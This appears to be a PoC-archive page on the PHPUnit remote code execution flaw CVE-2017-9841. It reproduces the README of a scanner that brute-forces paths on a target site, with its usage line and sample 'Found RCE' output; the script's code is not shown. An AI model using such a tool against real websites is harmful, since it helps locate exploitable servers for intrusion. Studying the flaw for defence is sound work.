Related vulnerability
Title:
PHPUnit security vulnerability
(CVE-2017-9841)
Description: TYPO3 is a free, open-source content management system maintained by the Swiss TYPO3 Association. PHPUnit is a PHP-based testing framework used within it. The file Util/PHP/eval-stdin.php in PHPUnit versions before 4.8.28, and in 5.x versions before 5.6.3, contains a security vulnerability. A remote attacker can exploit it to execute arbitrary PHP code by sending HTTP POST data that begins with the string '<?php'.
Description
Tool to try multiple paths for the PHPUnit RCE (CVE-2017-9841)
Introduction
# phpunit-brute
Tool to try multiple paths for the PHPUnit RCE (CVE-2017-9841); any paths found are logged to found.txt in the current directory.
It uses the following list of paths: `https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt`
If you have a path that is not on there, please submit a PR.
```
usage: phpunit-brute.py [-h] -u URL [-p PROXY]
phpunit-brute.py: error: the following arguments are required: -u/--url
```
Example
---
```
python3 phpunit-brute.py -u http://someoldwebsite.com
[-] No Luck for /_inc/vendor/stripe/stripe-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/cron/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel E2N test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel%20E2N%20test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /172410101040/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /1board/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /20170811125232/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[+] Found RCE for http://someoldwebsite.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [+]
```
File snapshot
[4.0K] /data/pocs/a01add6962ba9760208d382ffa51c0d04b8a180f
├── [2.6K] phpunit-brute.py
└── [1.4K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the code through the original source first.
2. If the source has become unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.